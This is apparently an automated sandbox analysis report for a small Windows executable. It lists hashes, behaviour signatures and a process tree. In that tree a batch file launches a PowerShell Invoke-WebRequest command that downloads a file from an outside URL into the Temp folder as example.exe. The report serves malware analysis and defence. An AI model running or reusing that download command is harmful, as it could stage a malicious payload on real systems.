Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
26/08/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe
Resource
win7-20240705-en
General
-
Target
20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe
-
Size
6KB
-
MD5
01846777e9d687771f28a1df5797b151
-
SHA1
4ede6b7ebee249b6cb241d1fb4b23f79d9aeca12
-
SHA256
51aa38810bf2c2f6f08eee6a75809543e78dc241a4587a8d0a0b0a76883be58a
-
SHA512
9e189c2ec6fbe481e4c3c6b3f0c5a648dcebd1779d70d938f9d193e157fcbe5c092ba438a662837fb1473bbf7e89bea3efc4c289d3d36130e7c37719834c8927
-
SSDEEP
48:0Pzuz3/foXeYDjyaAYqMettsQSaJiTi8xLEcztPLb3b3vr5vEuu6P+65I6rbJu:0P67TeuaABBDSyst9pvr51V+65vu
Malware Config
Signatures
-
pid Process 2760 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2760 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2760 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1424 wrote to memory of 2700 1424 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe 32 PID 1424 wrote to memory of 2700 1424 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe 32 PID 1424 wrote to memory of 2700 1424 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe 32 PID 1424 wrote to memory of 2700 1424 20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe 32 PID 2700 wrote to memory of 2760 2700 cmd.exe 33 PID 2700 wrote to memory of 2760 2700 cmd.exe 33 PID 2700 wrote to memory of 2760 2700 cmd.exe 33 PID 2700 wrote to memory of 2760 2700 cmd.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe"C:\Users\Admin\AppData\Local\Temp\20240826-1019_f53c60f1bc01c38d6ea6284d6c2bfc23.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1424 -
C:\Windows\SysWOW64\cmd.exe/c ""C:\Users\Admin\AppData\Local\Temp\259452142.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://d.kuku.lu/pzdpx22ew -OutFile C:\Users\Admin\AppData\Local\Temp\example.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
267B
MD5e935a45a7b718a715580e8ce15b12171
SHA1ce4a1affe0076f8dd33793986c67a17dd3b74556
SHA25676a0521bce7829098c7332ea262765db1d10203fbccfd2ded167700a3eb8d15d
SHA5121f57509a300893384bc71cb4b973177838f5aea12010101df89d1fa97995a91635b2fcf756a76a22e41189dd2c03445b3f930568461f787ed6c17eb2930a36e4